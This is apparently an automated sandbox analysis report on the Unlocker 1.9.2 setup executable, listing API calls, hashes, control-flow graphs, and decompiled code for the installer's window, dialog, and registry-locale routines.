                                                                                                                                                              0x00403c9a
                                                                                                                                                              0x00403c9c
                                                                                                                                                              0x00403ca1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ca7
                                                                                                                                                              0x00403caa
                                                                                                                                                              0x00403cad
                                                                                                                                                              0x00403cc4
                                                                                                                                                              0x00403cd0
                                                                                                                                                              0x00403ce9
                                                                                                                                                              0x00403cef
                                                                                                                                                              0x00403cf3
                                                                                                                                                              0x00403cf8
                                                                                                                                                              0x00403cfe
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d08
                                                                                                                                                              0x00403d13
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403d13
                                                                                                                                                              0x00403c3d
                                                                                                                                                              0x00403c43
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c49
                                                                                                                                                              0x00403c4f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403c55
                                                                                                                                                              0x00403c29
                                                                                                                                                              0x00403d20
                                                                                                                                                              0x00403d2c
                                                                                                                                                              0x00403d33
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a84
                                                                                                                                                              0x00403a84
                                                                                                                                                              0x00403a87
                                                                                                                                                              0x00403aba
                                                                                                                                                              0x00403aba
                                                                                                                                                              0x00403abc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403abc
                                                                                                                                                              0x00403a89
                                                                                                                                                              0x00403a8d
                                                                                                                                                              0x00403a92
                                                                                                                                                              0x00403a94
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403aa4
                                                                                                                                                              0x00403aac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403ab2
                                                                                                                                                              0x004038e0
                                                                                                                                                              0x004038e0
                                                                                                                                                              0x004038e4
                                                                                                                                                              0x004038e9
                                                                                                                                                              0x004038f8
                                                                                                                                                              0x004038f8
                                                                                                                                                              0x00403901
                                                                                                                                                              0x0040390a
                                                                                                                                                              0x00403915
                                                                                                                                                              0x00403915
                                                                                                                                                              0x00403921
                                                                                                                                                              0x0040393d
                                                                                                                                                              0x00403940
                                                                                                                                                              0x00403953
                                                                                                                                                              0x00403959
                                                                                                                                                              0x004039fc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403a05
                                                                                                                                                              0x0040395f
                                                                                                                                                              0x0040396c
                                                                                                                                                              0x0040396e
                                                                                                                                                              0x00403970
                                                                                                                                                              0x0040398f
                                                                                                                                                              0x0040398f
                                                                                                                                                              0x00403992
                                                                                                                                                              0x00403997
                                                                                                                                                              0x0040399a
                                                                                                                                                              0x004039aa
                                                                                                                                                              0x004039ab
                                                                                                                                                              0x004039ad
                                                                                                                                                              0x004039e3
                                                                                                                                                              0x004039f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039f6
                                                                                                                                                              0x004039af
                                                                                                                                                              0x004039b5
                                                                                                                                                              0x004039ce
                                                                                                                                                              0x004039d3
                                                                                                                                                              0x004039d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004039d7
                                                                                                                                                              0x004039c3
                                                                                                                                                              0x004039c3

                                                                                                                                                              APIs
                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403915
                                                                                                                                                              • DestroyWindow.USER32 ref: 00403929
                                                                                                                                                              • SetWindowLongA.USER32 ref: 00403945
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403966
                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403A2F
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403A39
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403A53
                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403B4A
                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403B7D
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403B98
                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                                                                                              • EnableMenuItem.USER32 ref: 00403BB5
                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                                                                                                                                              • lstrlenA.KERNEL32(00420478,?,00420478,Unlocker 1.9.2 Setup), ref: 00403C09
                                                                                                                                                              • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Item$MessageSend$CallbackDispatcherShowUser$Menu$DestroyEnableEnabledLongSystemTextlstrlen
                                                                                                                                                              • String ID: Unlocker 1.9.2 Setup
                                                                                                                                                              • API String ID: 2523155381-3402739367
                                                                                                                                                              • Opcode ID: 17db576ff1e04bb401156bec3937a30c5754e03700d25ec8c7f88e75de32935b
                                                                                                                                                              • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                                                                                              • Opcode Fuzzy Hash: 17db576ff1e04bb401156bec3937a30c5754e03700d25ec8c7f88e75de32935b
                                                                                                                                                              • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 381 403526-40353e call 405cff 384 403540-403550 call 40593b 381->384 385 403552-403579 call 4058c4 381->385 393 40359c-4035c5 call 4037ef call 4055b1 384->393 390 403591-403597 lstrcatA 385->390 391 40357b-40358c call 4058c4 385->391 390->393 391->390 399 4035cb-4035d0 393->399 400 40364c-403654 call 4055b1 393->400 399->400 401 4035d2-4035ea call 4058c4 399->401 406 403662-403687 LoadImageA 400->406 407 403656-40365d call 4059ff 400->407 405 4035ef-4035f6 401->405 405->400 408 4035f8-4035fa 405->408 410 403716-40371e call 40140b 406->410 411 40368d-4036c3 RegisterClassA 406->411 407->406 415 40360b-403617 lstrlenA 408->415 416 4035fc-403609 call 4054fb 408->416 423 403720-403723 410->423 424 403728-403733 call 4037ef 410->424 412 4037e5 411->412 413 4036c9-403711 SystemParametersInfoA CreateWindowExA 411->413 420 4037e7-4037ee 412->420 413->410 417 403619-403627 lstrcmpiA 415->417 418 40363f-403647 call 4054d0 call 4059dd 415->418 416->415 417->418 422 403629-403633 GetFileAttributesA 417->422 418->400 427 403635-403637 422->427 428 403639-40363a call 405517 422->428 423->420 434 403739-403756 ShowWindow LoadLibraryA 424->434 435 4037bc-4037bd call 404e4d 424->435 427->418 427->428 428->418 437 403758-40375d LoadLibraryA 434->437 438 40375f-403771 GetClassInfoA 434->438 439 4037c2-4037c4 435->439 437->438 440 403773-403783 GetClassInfoA RegisterClassA 438->440 441 403789-4037ac DialogBoxParamA call 40140b 438->441 442 4037c6-4037cc 439->442 443 4037de-4037e0 call 40140b 439->443 440->441 447 4037b1-4037ba call 403476 441->447 442->423 445 4037d2-4037d9 call 40140b 442->445 443->412 445->423 447->420
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00403526() {
                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				char _v20;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* __edi;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				intOrPtr* _t20;
                                                                                                                                                              				signed int _t24;
                                                                                                                                                              				void* _t28;
                                                                                                                                                              				void* _t30;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                              				int _t38;
                                                                                                                                                              				intOrPtr _t39;
                                                                                                                                                              				int _t42;
                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                              				char _t62;
                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                              				signed char _t68;
                                                                                                                                                              				struct HINSTANCE__* _t76;
                                                                                                                                                              				CHAR* _t79;
                                                                                                                                                              				intOrPtr _t81;
                                                                                                                                                              				CHAR* _t86;
                                                                                                                                                              
                                                                                                                                                              				_t81 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              				_t20 = E00405CFF(6);
                                                                                                                                                              				_t88 = _t20;
                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                              					_t79 = 0x420478;
                                                                                                                                                              					"1033" = 0x7830;
                                                                                                                                                              					E004058C4(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420478, 0);
                                                                                                                                                              					__eflags =  *0x420478;
                                                                                                                                                              					if(__eflags == 0) {
                                                                                                                                                              						E004058C4(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420478, 0);
                                                                                                                                                              					}
                                                                                                                                                              					lstrcatA("1033", _t79);
                                                                                                                                                              				} else {
                                                                                                                                                              					E0040593B("1033",  *_t20() & 0x0000ffff);
                                                                                                                                                              				}
                                                                                                                                                              				E004037EF(_t76, _t88);
                                                                                                                                                              				_t24 =  *0x423e98; // 0xa1
                                                                                                                                                              				_t85 = "C:\\Program Files\\Unlocker";
                                                                                                                                                              				 *0x423f00 = _t24 & 0x00000020;
                                                                                                                                                              				 *0x423f1c = 0x10000;
                                                                                                                                                              				if(E004055B1(_t88, "C:\\Program Files\\Unlocker") != 0) {
                                                                                                                                                              					L16:
                                                                                                                                                              					if(E004055B1(_t96, _t85) == 0) {
                                                                                                                                                              						E004059FF(0, _t79, _t81, _t85,  *((intOrPtr*)(_t81 + 0x118))); // executed
                                                                                                                                                              					}
                                                                                                                                                              					_t28 = LoadImageA( *0x423e80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                                                              					 *0x423668 = _t28;
                                                                                                                                                              					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
                                                                                                                                                              						L21:
                                                                                                                                                              						if(E0040140B(0) == 0) {
                                                                                                                                                              							_t30 = E004037EF(_t76, __eflags);
                                                                                                                                                              							__eflags =  *0x423f20; // 0x0
                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                              								_t31 = E00404E4D(_t30, 0);
                                                                                                                                                              								__eflags = _t31;
                                                                                                                                                              								if(_t31 == 0) {
                                                                                                                                                              									E0040140B(1);
                                                                                                                                                              									goto L33;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x42364c; // 0x0
                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                              									E0040140B(2);
                                                                                                                                                              								}
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              							ShowWindow( *0x420450, 5); // executed
                                                                                                                                                              							_t37 = LoadLibraryA("RichEd20"); // executed
                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                              							if(_t37 == 0) {
                                                                                                                                                              								LoadLibraryA("RichEd32");
                                                                                                                                                              							}
                                                                                                                                                              							_t86 = "RichEdit20A";
                                                                                                                                                              							_t38 = GetClassInfoA(0, _t86, 0x423620);
                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                              							if(_t38 == 0) {
                                                                                                                                                              								GetClassInfoA(0, "RichEdit", 0x423620);
                                                                                                                                                              								 *0x423644 = _t86;
                                                                                                                                                              								RegisterClassA(0x423620);
                                                                                                                                                              							}
                                                                                                                                                              							_t39 =  *0x423660; // 0x0
                                                                                                                                                              							_t42 = DialogBoxParamA( *0x423e80, _t39 + 0x00000069 & 0x0000ffff, 0, E004038BC, 0); // executed
                                                                                                                                                              							E00403476(E0040140B(5), 1);
                                                                                                                                                              							return _t42;
                                                                                                                                                              						}
                                                                                                                                                              						L22:
                                                                                                                                                              						_t34 = 2;
                                                                                                                                                              						return _t34;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t76 =  *0x423e80; // 0x400000
                                                                                                                                                              						 *0x423634 = _t28;
                                                                                                                                                              						_v20 = 0x624e5f;
                                                                                                                                                              						 *0x423624 = E00401000;
                                                                                                                                                              						 *0x423630 = _t76;
                                                                                                                                                              						 *0x423644 =  &_v20;
                                                                                                                                                              						if(RegisterClassA(0x423620) == 0) {
                                                                                                                                                              							L33:
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              							return 0;
                                                                                                                                                              						}
                                                                                                                                                              						_t12 =  &_v16; // 0x624e5f
                                                                                                                                                              						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                                                                                              						 *0x420450 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423e80, 0);
                                                                                                                                                              						goto L21;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t76 =  *(_t81 + 0x48);
                                                                                                                                                              					if(_t76 == 0) {
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					_t60 =  *0x423eb8; // 0x745dec
                                                                                                                                                              					_t79 = 0x422e20;
                                                                                                                                                              					E004058C4( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422e20, 0);
                                                                                                                                                              					_t62 =  *0x422e20; // 0x52
                                                                                                                                                              					if(_t62 == 0) {
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t62 == 0x22) {
                                                                                                                                                              						_t79 = 0x422e21;
                                                                                                                                                              						 *((char*)(E004054FB(0x422e21, 0x22))) = 0;
                                                                                                                                                              					}
                                                                                                                                                              					_t64 = lstrlenA(_t79) + _t79 - 4;
                                                                                                                                                              					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
                                                                                                                                                              						L15:
                                                                                                                                                              						E004059DD(_t85, E004054D0(_t79));
                                                                                                                                                              						goto L16;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t68 = GetFileAttributesA(_t79);
                                                                                                                                                              						if(_t68 == 0xffffffff) {
                                                                                                                                                              							L14:
                                                                                                                                                              							E00405517(_t79);
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						_t96 = _t68 & 0x00000010;
                                                                                                                                                              						if((_t68 & 0x00000010) != 0) {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						}
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}






























                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                                                              • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\Unlocker1.9.2.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                                                                                                                                              • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files\Unlocker,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\Unlocker1.9.2.exe"), ref: 0040360C
                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Program Files\Unlocker,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000), ref: 0040361F
                                                                                                                                                              • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 0040362A
                                                                                                                                                              • LoadImageA.USER32 ref: 00403673
                                                                                                                                                                • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                                                                                                                                              • RegisterClassA.USER32 ref: 004036BA
                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                                                                                                                                              • CreateWindowExA.USER32 ref: 0040370B
                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                                                                                                                                              • LoadLibraryA.KERNELBASE(RichEd20), ref: 00403752
                                                                                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                                                                                                                                              • GetClassInfoA.USER32 ref: 0040376D
                                                                                                                                                              • GetClassInfoA.USER32 ref: 0040377A
                                                                                                                                                              • RegisterClassA.USER32 ref: 00403783
                                                                                                                                                              • DialogBoxParamA.USER32 ref: 004037A2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: "C:\Users\user\Desktop\Unlocker1.9.2.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Program Files\Unlocker$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$]t
                                                                                                                                                              • API String ID: 914957316-3020842814
                                                                                                                                                              • Opcode ID: f93f1545b230c8163d09655257c65a13db3ac628cd3f161671649cd9b752f71f
                                                                                                                                                              • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                                                                                                                                              • Opcode Fuzzy Hash: f93f1545b230c8163d09655257c65a13db3ac628cd3f161671649cd9b752f71f
                                                                                                                                                              • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 452 403ed7-403ee7 453 403ffa-40400d 452->453 454 403eed-403ef5 452->454 457 404069-40406d 453->457 458 40400f-404018 453->458 455 403ef7-403f06 454->455 456 403f08-403fa0 call 403d8f * 2 CheckDlgButton call 403db1 GetDlgItem call 403dc4 SendMessageA 454->456 455->456 490 403fa2-403fa5 GetSysColor 456->490 491 403fab-403ff5 SendMessageA * 2 lstrlenA SendMessageA * 2 456->491 462 404073-404087 GetDlgItem 457->462 463 40413d-404144 457->463 459 40414c 458->459 460 40401e-404026 458->460 466 40414f-404156 call 403df6 459->466 460->459 464 40402c-404038 460->464 468 404089-404090 462->468 469 4040fb-404102 462->469 463->459 465 404146 463->465 464->459 470 40403e-404064 GetDlgItem SendMessageA call 403db1 call 404162 464->470 465->459 476 40415b-40415f 466->476 468->469 473 404092-4040ad 468->473 469->466 474 404104-40410b 469->474 470->457 473->469 478 4040af-4040f8 SendMessageA LoadCursorA SetCursor ShellExecuteA LoadCursorA SetCursor 473->478 474->466 479 40410d-404111 474->479 478->469 482 404113-404122 SendMessageA 479->482 483 404124-404128 479->483 482->483 484 404138-40413b 483->484 485 40412a-404136 SendMessageA 483->485 484->476 485->484 490->491 491->476
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00403ED7(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                                                                              				char* _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				struct HWND__* _t52;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				intOrPtr _t85;
                                                                                                                                                              				long _t86;
                                                                                                                                                              				int _t98;
                                                                                                                                                              				struct HWND__* _t99;
                                                                                                                                                              				signed int _t100;
                                                                                                                                                              				intOrPtr _t103;
                                                                                                                                                              				intOrPtr _t107;
                                                                                                                                                              				intOrPtr _t109;
                                                                                                                                                              				int _t110;
                                                                                                                                                              				signed int* _t112;
                                                                                                                                                              				signed int _t113;
                                                                                                                                                              				char* _t114;
                                                                                                                                                              				CHAR* _t115;
                                                                                                                                                              
                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                              						L11:
                                                                                                                                                              						if(_a8 != 0x4e) {
                                                                                                                                                              							if(_a8 == 0x40b) {
                                                                                                                                                              								 *0x420458 =  *0x420458 + 1;
                                                                                                                                                              							}
                                                                                                                                                              							L25:
                                                                                                                                                              							_t110 = _a16;
                                                                                                                                                              							L26:
                                                                                                                                                              							return E00403DF6(_a8, _a12, _t110);
                                                                                                                                                              						}
                                                                                                                                                              						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                              						_t110 = _a16;
                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                                                                              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                                                                              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                                                                              							_v12 = _t100;
                                                                                                                                                              							_v16 = _t109;
                                                                                                                                                              							_v8 = 0x422e20;
                                                                                                                                                              							if(_t100 - _t109 < 0x800) {
                                                                                                                                                              								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                                                                              								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                                                                              								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                                                                                              								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                                                                              								_t110 = _a16;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                                                                              							goto L26;
                                                                                                                                                              						} else {
                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                                                                              								SendMessageA( *0x423e88, 0x111, 1, 0);
                                                                                                                                                              							}
                                                                                                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                                                                              								SendMessageA( *0x423e88, 0x10, 0, 0);
                                                                                                                                                              							}
                                                                                                                                                              							return 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					if(_a12 >> 0x10 != 0 ||  *0x420458 != 0) {
                                                                                                                                                              						goto L25;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t103 =  *0x41fc48; // 0x73f11c
                                                                                                                                                              						_t25 = _t103 + 0x14; // 0x73f130
                                                                                                                                                              						_t112 = _t25;
                                                                                                                                                              						if(( *_t112 & 0x00000020) == 0) {
                                                                                                                                                              							goto L25;
                                                                                                                                                              						}
                                                                                                                                                              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                              						E00403DB1(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                              						E00404162();
                                                                                                                                                              						goto L11;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t98 = _a16;
                                                                                                                                                              				_t113 =  *(_t98 + 0x30);
                                                                                                                                                              				if(_t113 < 0) {
                                                                                                                                                              					_t107 =  *0x42365c; // 0x7664ab
                                                                                                                                                              					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                                                                              				}
                                                                                                                                                              				_t71 =  *0x423eb8; // 0x745dec
                                                                                                                                                              				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                                                                              				_t114 = _t113 + _t71;
                                                                                                                                                              				_push(0x22);
                                                                                                                                                              				_a16 =  *_t114;
                                                                                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                                                                                              				_t115 = _t114 + 1;
                                                                                                                                                              				_v16 = _t115;
                                                                                                                                                              				_v8 = E00403EA3;
                                                                                                                                                              				E00403D8F(_a4);
                                                                                                                                                              				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                                                                              				_push(0x23);
                                                                                                                                                              				E00403D8F(_a4);
                                                                                                                                                              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                              				E00403DB1( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                                                                              				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                              				E00403DC4(_t99);
                                                                                                                                                              				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                                                                              				_t85 =  *0x423e90; // 0x73eeb0
                                                                                                                                                              				_t86 =  *(_t85 + 0x68);
                                                                                                                                                              				if(_t86 < 0) {
                                                                                                                                                              					_t86 = GetSysColor( ~_t86);
                                                                                                                                                              				}
                                                                                                                                                              				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                                                                              				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                                                                              				 *0x41f43c =  *0x41f43c & 0x00000000;
                                                                                                                                                              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                                                                              				SendMessageA(_t99, 0x449, _a16,  &_v16); // executed
                                                                                                                                                              				 *0x420458 =  *0x420458 & 0x00000000;
                                                                                                                                                              				return 0;
                                                                                                                                                              			}






















                                                                                                                                                              APIs
                                                                                                                                                              • CheckDlgButton.USER32 ref: 00403F62
                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F76
                                                                                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00403FA5
                                                                                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                                                                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00403FCD
                                                                                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                                                                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040404D
                                                                                                                                                              • SendMessageA.USER32(00000000), ref: 00404050
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040407B
                                                                                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                                                                                                                                              • LoadCursorA.USER32 ref: 004040CA
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004040D3
                                                                                                                                                              • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                                                                                                                                              • LoadCursorA.USER32 ref: 004040F3
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004040F6
